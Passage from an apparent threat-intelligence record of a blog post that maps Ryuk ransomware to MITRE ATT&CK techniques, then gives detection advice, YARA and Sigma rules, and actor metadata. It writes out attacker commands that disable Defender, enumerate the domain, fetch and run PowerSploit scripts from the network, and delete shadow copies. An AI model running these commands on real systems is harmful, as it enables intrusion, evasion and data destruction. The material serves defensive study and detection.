T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions\r\nModification Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based\r\nrestrictions on files and directories.\r\n3. T1562.001 - Impair Defenses: Disable or Modify Tools Ryuk has stopped services related to anti-virus.\r\nRyuk used encoded powershell command to disable Microsoft Windows Defender Service. (Set-MpPreference -DisableRealtimeMonitoring $true)\r\n1powershell.exe -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiA\r\n4. T1036 - Masquerading Ryuk can create .dll files that actually contain a Rich Text File format document.\r\n5. T1036.005 - Match Legitimate Name or Location Ryuk has constructed legitimate appearing installation\r\nfolder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the\r\npath. For Windows Vista or higher, the path would appear as C:\\Users\\Public .\r\n6. T1027 - Obfuscated Files or Information Ryuk can use anti-disassembly and code transformation\r\nobfuscation techniques.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 22 of 31\n\n7. T1205 - Traffic Signaling Ryuk has used Wake-on-Lan to power on turned off systems for lateral\r\nmovement.\r\nDiscovery\r\n1. T1018 - Remote System Discovery Ryuk uses cmd.exe and powershell.exe to discover remote systems.\r\n1cmd /c \"net view /all\"\r\n2cmd /c \"net view /all /domain\"\r\n3powershell.exe -exec bypass -Command \"\u0026{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType\r\n2. T1057 - Process Discovery Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.\r\n3. 
T1082 - System Information Discovery Ryuk has called GetLogicalDrives to enumerate all mounted\r\ndrives, and GetDriveTypeW to determine the drive type.\r\ncmd /c systeminfo\r\ncurl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -o $env:Temp\\ryuk\r\nImport-Module $env:Temp\\ryuk\\pv.ps1\r\nInvoke-CheckLocalAdminAccess\r\nFind-LocalAdminAccess\r\nGet-NetSubnet\r\nGet-NetComputer\r\nnet config workstation\r\n4. T1083 - File and Directory Discovery Ryuk has enumerated files and folders on all mounted drives.\r\n5. T1087 - Account Discovery Ryuk may attempt to get a listing of accounts on a system or within an\r\nenvironment.\r\n`cmd /c net group \"Enterprise Admins\" /domain`\r\n6. T1087.002 - Domain Account Ryuk has the ability to identify domain administrator accounts.\r\n`cmd /c net group \"Domain Admins\" /do`\r\n7. T1482 - Domain Trust Discovery Ryuk uses the Nltest tool to obtain information about the domain.\r\n`cmd /c nltest /domain_trusts \u003e %USERPROFILE%\\Desktop\\ryuk\\ryuk_adf\\ad_trustdmp.txt`, `cmd /c nltest /dclist:\r\n8. T1614.001 - System Location Discovery: System Language Discovery Ryuk has been observed to query\r\nthe registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language and the value\r\nInstallLanguage. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423\r\n(Belarusian), it stops execution.\r\n9. T1016 - System Network Configuration Discovery Ryuk has called GetIpNetTable in an attempt to identify\r\nall mounted drives and hosts that have Address Resolution Protocol (ARP) entries.\r\n10. 
T1518 - Software Discovery Ryuk can query the registry to get the list of software installed.\r\nGet-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, Disp\r\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object Displa\r\n11. T1518.001 - Security Software Discovery Ryuk can query the AntivirusProduct CIM class in the root/SecurityCenter2\r\nnamespace to obtain the installed antivirus product name.\r\n`Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct`\r\nCommand and Control\r\n1. T1071 - Application Layer Protocol Ryuk may communicate using application layer protocols to avoid\r\ndetection/network filtering by blending in with existing traffic.\r\n2. T1105 - Ingress Tool Transfer Ryuk transfers a batch script designed to kill a list of processes and services\r\nas mentioned above. 
Ryuk uses AdFind.exe to query Active Directory.\r\ncurl https://www.joeware.net/downloads/files/AdFind.zip -o $env:TEMP\\ryuk\\af.zip\r\nExpand-Archive $env:TEMP\\ryuk\\af.zip -DestinationPath $env:TEMP\\ryuk\\af\r\n\r\ncd $env:TEMP\\ryuk\\af\r\n.\\AdFind.exe -f \"(objectcategory=person)\" \u003e $env:TEMP\\ryuk\\af\\ad_users.txt\r\n.\\AdFind.exe -f \"objectcategory=computer\" \u003e $env:TEMP\\ryuk\\af\\ad_computers.txt\r\n.\\AdFind.exe -sc trustdmp \u003e $env:TEMP\\ryuk\\af\\trustdmp.txt\r\n.\\AdFind.exe -subnets -f \"(objectCategory=subnet)\" \u003e $env:TEMP\\ryuk\\af\\subnets.txt\r\n.\\AdFind.exe -gcb -sc trustdmp \u003e $env:TEMP\\ryuk\\af\\trustdmp.txt\r\n.\\AdFind.exe -sc domainlist \u003e $env:TEMP\\ryuk\\af\\domainlist.txt\r\n.\\AdFind.exe -sc dcmodes \u003e $env:TEMP\\ryuk\\af\\dcmodes.txt\r\n.\\AdFind.exe -sc adinfo \u003e $env:TEMP\\ryuk\\af\\adinfo.txt\r\n.\\AdFind.exe -sc dclist \u003e $env:TEMP\\ryuk\\af\\dclist.txt\r\n.\\AdFind.exe -sc computers_pwdnotreqd \u003e $env:TEMP\\ryuk\\af\\computer_pwdnotereqd.txt\r\n\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13\r\n3. T1573 - Encrypted Channel Ryuk may employ a known encryption algorithm to conceal command and\r\ncontrol traffic rather than relying on any inherent protections provided by a communication protocol.\r\nCollection\r\n1. T1074 - Data Staged Ryuk may stage collected data in a central location or directory prior to exfiltration.\r\nData may be kept in separate files or combined into one file through techniques such as Archive Collected\r\nData.\r\n`powershell \"Compress-Archive $env:TEMP\\ryuk\\ryuk_adf $env:TEMP\\ryuk\\ryuk_adf.zip\"`\r\nLateral Movement\r\n1. T1021.002 - Remote Services: SMB/Windows Admin Shares Ryuk has used the C$ network share for\r\nlateral movement.\r\n2. 
T1078.002 - Valid Accounts: Domain Accounts Ryuk can use stolen domain admin accounts to move\r\nlaterally within a victim domain.\r\n3. T1078.003 - Valid Accounts: Local Accounts Adversaries may obtain and abuse credentials of a local\r\naccount as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b2288\r\nInvoke-CheckLocalAdminAccess\r\nFind-LocalAdminAccess\r\nExfiltration\r\n1. T1041 - Exfiltration Over C2 Channel\r\ntype %TEMP%\\ryuk\\af\\ad_users.txt\r\ntype %TEMP%\\ryuk\\af\\ad_computers.txt\r\ntype %TEMP%\\ryuk\\af\\trustdmp.txt\r\ntype %TEMP%\\ryuk\\af\\subnets.txt\r\ntype %TEMP%\\ryuk\\af\\trustdmp.txt\r\ntype %TEMP%\\ryuk\\af\\domainlist.txt\r\ntype %TEMP%\\ryuk\\af\\dcmodes.txt\r\ntype %TEMP%\\ryuk\\af\\adinfo.txt\r\ntype %TEMP%\\ryuk\\af\\dclist.txt\r\ntype %TEMP%\\ryuk\\af\\computer_pwdnotereqd.txt\r\ntype %TEMP%\\ryuk\\af\\ad_trustdmp.txt\r\nImpact\r\n1. T1486 - Data Encrypted for Impact Ryuk has used a combination of symmetric (AES) and asymmetric\r\n(RSA) encryption to encrypt files. Each file is encrypted with its own AES key and given the file\r\nextension .RYK. A ransom note named RyukReadMe.txt is written to each encrypted\r\ndirectory.\r\n2. T1490 - Inhibit System Recovery Ryuk has used vssadmin Delete Shadows /all /quiet to delete\r\nvolume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by\r\nthird-party applications.\r\n3. 
T1489 - Service Stop Ryuk has called kill.bat to stop services, disable services and kill\r\nprocesses.\r\nDetection and Mitigation Opportunities\r\nFalling victim to a Ryuk ransomware attack is exceptionally costly to an organisation. The operators of the Ryuk\r\nransomware put effort into developing a targeted spear phishing lure, and they demand a high ransom for their\r\ntrouble. However, sometimes, even paying the ransom is not enough to regain a company's access to sensitive or\r\nvaluable data.\r\nFor this reason, it is far better to prevent a ransomware attack than to react to it. Therefore, it is essential to\r\ndetect the attack at the beginning of the cycle; if your security controls can detect the Ryuk malware before\r\nencryption begins, the incident can be mitigated without harming the organisation. This brings in the need for a\r\ncontinuous assessment of your organisation's security posture to ensure that your security controls are tuned well\r\nand prevent such impactful actions from executing.\r\nAcross the threat analysis of Ryuk, we see commonalities regarding IOCs and TTPs and explicit commands and\r\nactions used by this current version of the ransomware attack. The commands, paired with the detailed account of\r\ncompromise timelines, give defenders valuable insight into building up their defences against Ryuk.\r\nSuspicious commands that a regular user would never execute include the use of cmd.exe and\r\nPowerShell.exe to run the following:\r\nnet view\r\nnet group\r\nnltest\r\n-EncodedCommand flag\r\nadfind.exe\r\npowerview.ps1\r\nThe behaviours and TTPs discussed in this article should be logged and flagged. 
Ryuk targets a variety of services,\r\na few of which are specific to third-party products; therefore, even alerting on services such as Sophos Agent or Veeam\r\nBackup going offline unexpectedly across your environment provides a vital IOC for Ryuk.\r\nFinally, as with any ransomware, the ability to alert on massive and sweeping file creation, deletion, and\r\nencryption is exceptionally insightful to an organisation as it permits defenders to fine-tune their alerts.\r\nIt is recommended that only administrators and end users with specific needs be able to run administrative tools\r\nsuch as cmd, PowerShell, net, wmic, systeminfo, arp, or route. Limiting these tools to only authorised\r\nusers reduces the chance of a compromised end user being able to enumerate system and environmental settings.\r\nAdditionally, from a detection PoV, we can implement various rules for alerts:\r\nUsing Splunk to detect Ryuk Ransomware: https://www.splunk.com/en_us/blog/security/detecting-ryuk-using-splunk-attack-range.html\r\nHere are the YARA rules submitted by Marc Elias and Christiaan Beek of the McAfee ATR Team:\r\nrule Ryuk_Ransomware {\r\n  meta:\r\n    description = \"Ryuk Ransomware hunting rule\"\r\n    author = \"Christiaan Beek - McAfee ATR team\"\r\n    date = \"2019-04-25\"\r\n    rule_version = \"v2\"\r\n    malware_type = \"ransomware\"\r\n    malware_family = \"Ransom:W32/Ryuk\"\r\n    actor_type = \"Cybercrime\"\r\n    actor_group = \"Unknown\"\r\n    reference = \"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-t\r\n\r\n  strings:\r\n    $x1 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n    $x2 = \"\\\\System32\\\\cmd.exe\" fullword wide\r\n    $s1 = \"C:\\\\Users\\\\Admin\\\\Documents\\\\Visual Studio 2015\\\\Projects\\\\ConsoleApplication54new crypted\" ascii\r\n    $s2 = \"fg4tgf4f3.dll\" fullword wide\r\n    $s3 = \"lsaas.exe\" fullword wide\r\n    $s4 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\r\n    $s5 = \"\\\\Documents and Settings\\\\Default User\\\\finish\" fullword wide\r\n    $s6 = \"\\\\users\\\\Public\\\\sys\" fullword wide\r\n    $s7 = \"\\\\users\\\\Public\\\\finish\" fullword wide\r\n    $s8 = \"You will receive btc address for payment in the reply letter\" fullword ascii\r\n    $s9 = \"hrmlog\" fullword wide\r\n    $s10 = \"No system is safe\" fullword ascii\r\n    $s11 = \"keystorage2\" fullword wide\r\n    $s12 = \"klnagent\" fullword wide\r\n    $s13 = \"sqbcoreservice\" fullword wide\r\n    $s14 = \"tbirdconfig\" fullword wide\r\n    $s15 = \"taskkill\" fullword wide\r\n\r\n    $op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }\r\n    $op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }\r\n\r\n  condition:\r\n    ( uint16(0) == 0x5a4d and\r\n    filesize \u003c 400KB and\r\n    ( 1 of ($x*) and\r\n    4 of them ) and\r\n    all of ($op*)) or\r\n    ( all of them )\r\n}\r\n\r\nrule Ransom_Ryuk_sept2020 {\r\n  meta:\r\n    description = \"Detecting latest Ryuk samples\"\r\n    author = \"McAfee ATR\"\r\n    date = \"2020-10-13\"\r\n    malware_type = \"ransomware\"\r\n    malware_family = \"Ransom:W32/Ryuk\"\r\n    actor_type = \"Cybercrime\"\r\n    actor_group = \"Unknown\"\r\n    hash1 = \"cfdc2cb47ef3d2396307c487fc3c9fe55b3802b2e570bee9aea4ab1e4ed2ec28\"\r\n  strings:\r\n    $x1 = \"\\\" /TR \\\"C:\\\\Windows\\\\System32\\\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p \" fullword\r\n    $x2 = \"cmd.exe /c \\\"bcdedit /set {default} recoveryenabled No \u0026 bcdedit /set {default}\\\"\" fullword ascii\r\n    $x3 = \"cmd.exe /c \\\"bootstatuspolicy ignoreallfailures\\\"\" fullword ascii\r\n    $x4 = \"cmd.exe /c \\\"vssadmin.exe Delete Shadows /all /quiet\\\"\" fullword ascii\r\n    $x5 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n    $x6 = \"cmd.exe /c \\\"WMIC.exe shadowcopy delete\\\"\" fullword ascii\r\n    $x7 = \"/C REG ADD \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\\\" /\r\n    $x8 = \"W/C REG DELETE \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\r\n    $x9 = \"\\\\System32\\\\cmd.exe\" fullword wide\r\n    $s10 = \"Ncsrss.exe\" fullword wide\r\n    $s11 = \"lsaas.exe\" fullword wide\r\n    $s12 = \"lan.exe\" fullword wide\r\n    $s13 = \"$WGetCurrentProcess\" fullword ascii\r\n    $s14 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\r\n    $s15 = \"Ws2_32.dll\" fullword ascii\r\n    $s16 = \" explorer.exe\" fullword wide\r\n    $s17 = \"e\\\\Documents and Settings\\\\Default User\\\\\" fullword wide\r\n    $s18 = \"\\\\users\\\\Public\\\\\" fullword ascii\r\n    $s19 = \"\\\\users\\\\Public\\\\sys\" fullword wide\r\n    $s20 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\\" fullword ascii\r\n\r\n    $seq0 = { 2b c7 50 e8 30 d3 ff ff ff b6 8c }\r\n    $seq1 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\r\n    $seq2 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\r\n  condition:\r\n    ( uint16(0) == 0x5a4d and\r\n    filesize \u003c 400KB and\r\n    ( 1 of ($x*) and 5 of them ) and\r\n    all of ($seq*)) or ( all of them )\r\n}\r\n\r\nrule RANSOM_RYUK_May2021 : ransomware\r\n{\r\n  meta:\r\n    description = \"Rule to detect latest May 2021 compiled Ryuk variant\"\r\n    author = \"Marc Elias | McAfee ATR Team\"\r\n    date = \"2021-05-21\"\r\n    hash = \"8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a\"\r\n    version = \"0.1\"\r\n\r\n  strings:\r\n    $ryuk_filemarker = \"RYUKTM\" fullword wide ascii\r\n\r\n    $sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }\r\n    $icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }\r\n\r\n  condition:\r\n    uint16(0) == 0x5a4d\r\n    and uint32(uint32(0x3C)) == 0x00004550\r\n    and filesize \u003c 200KB\r\n    and ( $ryuk_filemarker\r\n    or ( $sleep_constants\r\n    and $icmp_echo_constants ))\r\n}\r\nRyuk Behaviour Detection using Sigma Rules:\r\ntitle: Ryuk Ransomware\r\nid: c37510b8-2107-4b78-aa32-72f251e7a844\r\nstatus: test\r\ndescription: Detects Ryuk ransomware activity\r\nauthor: Florian Roth\r\nreferences:\r\n  - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\r\ndate: 2019/12/16\r\nmodified: 2021/11/27\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    CommandLine|contains|all:\r\n      - 'Microsoft\\Windows\\CurrentVersion\\Run'\r\n      - 'C:\\users\\Public\\'\r\n  condition: selection\r\nfields:\r\n  - CommandLine\r\n  - ParentCommandLine\r\nfalsepositives:\r\n  - Unlikely\r\nlevel: critical\r\ntags:\r\n  - attack.persistence\r\n  - attack.t1547.001\r\nConclusion\r\nIn summary, this attack flow for the Ryuk ransomware group will help security practitioners evaluate their security\r\nand incident response processes and improve their security control posture against an actor with focused\r\noperations to encrypt your systems and data.\r\nFourCore ATTACK is a continuous security validation platform providing assessments for your entire security\r\ninfrastructure to test and validate your security posture quickly and effectively.\r\nReferences\r\n1. RYUK Ransomware\r\n2. Ryuk Ransomware Detailed Analysis\r\n3. Ryuk targeting web servers\r\n4. The Curious Case of Ryuk Ransomware\r\n5. Ryuk Ransomware: The complete breakdown\r\n6. Ryuk over time\r\n7. Deep Analysis Ryuk\r\n8. Latest Ryuk Trends\r\n9. AnyRun Sim\r\n10. 
Scythe Simulation Playbook\r\nSource: https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp"
	],
	"report_names": [
		"ryuk-ransomware-simulation-mitre-ttp"
	],
	"threat_actors": [
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "06f622cb-3a78-49cf-9a4c-a6007a69325f",
			"created_at": "2022-10-25T16:07:23.315239Z",
			"updated_at": "2026-04-10T02:00:04.537826Z",
			"deleted_at": null,
			"main_name": "APT 3",
			"aliases": [
				"APT 3",
				"Boron",
				"Brocade Typhoon",
				"Bronze Mayfair",
				"Buckeye",
				"G0022",
				"Gothic Panda",
				"Group 6",
				"Operation Clandestine Fox",
				"Operation Clandestine Fox, Part Deux",
				"Operation Clandestine Wolf",
				"Operation Double Tap",
				"Red Sylvan",
				"TG-0110",
				"UPS Team"
			],
			"source_name": "ETDA:APT 3",
			"tools": [
				"APT3 Keylogger",
				"Agent.dhwf",
				"BKDR_HUPIGON",
				"Backdoor.APT.CookieCutter",
				"Badey",
				"Bemstour",
				"CookieCutter",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EXL",
				"EternalBlue",
				"HTran",
				"HUC Packet Transmit Tool",
				"Hupigon",
				"Hupigon RAT",
				"Kaba",
				"Korplug",
				"LaZagne",
				"MFC Huner",
				"OSInfo",
				"Pirpi",
				"PlugX",
				"RedDelta",
				"RemoteCMD",
				"SHOTPUT",
				"Sogu",
				"TIGERPLUG",
				"TTCalc",
				"TVT",
				"Thoper",
				"Xamtrav",
				"remotecmd",
				"shareip",
				"w32times"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434745,
	"ts_updated_at": 1775792246,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.pdf",
		"text": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.txt",
		"img": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.jpg"
	}
}